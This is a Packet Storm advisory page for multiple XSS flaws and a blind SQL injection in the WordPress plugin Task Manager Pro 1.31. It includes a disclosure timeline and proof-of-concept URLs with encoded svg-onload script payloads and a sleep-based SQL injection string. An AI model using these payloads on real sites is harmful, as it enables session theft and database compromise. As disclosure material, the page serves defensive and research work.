what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Task Manager Pro 1.31 Cross Site Scripting

WordPress Task Manager Pro 1.31 Cross Site Scripting
Posted Jul 19, 2017
Authored by 8bitsec

WordPress Task Manager Pro version 1.31 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 0ab5b7ff53cae033bdc9d97690414d0d194da945e56fab67995ebaee9abbcdc2

WordPress Task Manager Pro 1.31 Cross Site Scripting

Change Mirror Download
# Exploit Title: WordPress Task Manager Pro 1.31 - Multiple vulnerabilities
# Date: 2017-07-11
# Exploit Author: 8bitsec
# Vendor Homepage: https://www.w3bd.com/
# Software Link: http://codecanyon.net/item/task-manager-pro-all-in-one-project-based-task-management-plugin-for-wordrpress/19864872
# Version: 1.31
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-07-11

Product & Service Introduction:
===============================
Task Manager Pro is a full and functional task management plugin for wordpress.

Vulnerability Disclosure Timeline:
==================================
2017-07-10: Found the vulnerabilities.
2017-07-10: Reported to vendor.
2017-07-11: No response.
2017-07-11: Published.

Technical Details & Description:
================================

Multiple authenticated XSS vulnerabilities found logged as a low privileged user.

Blind SQL Injection on task-details page task parameter.

Proof of Concept (PoC):
=======================

Authenticated Stored XSS:

Logged as a follower, the lowest privileged user.
Write the payload in the 'Add a comment' section

Authenticated Reflected XSS

On task-edit, task-details, project-details pages:

https://localhost/wp-admin/admin.php?page=task-edit&task=8%2F%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E
https://localhost/wp-admin/admin.php?page=task-details&task=6%22%2F%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E
https://localhost/wp-admin/admin.php?page=project-details&project=%22%2F%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E

Authenticated Stored XSS

Logged as a user with edit privileges:
Edit Task Section. Task Name & Time Estimation fields are vulnerable.

Blind SQL Injection

Logged as a follower:
# 6 and sleep(1) and 1=1
https://localhost/wp/wp-admin/admin.php?page=task-details&task=6+and+sleep(1)+and+1%3D1

Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close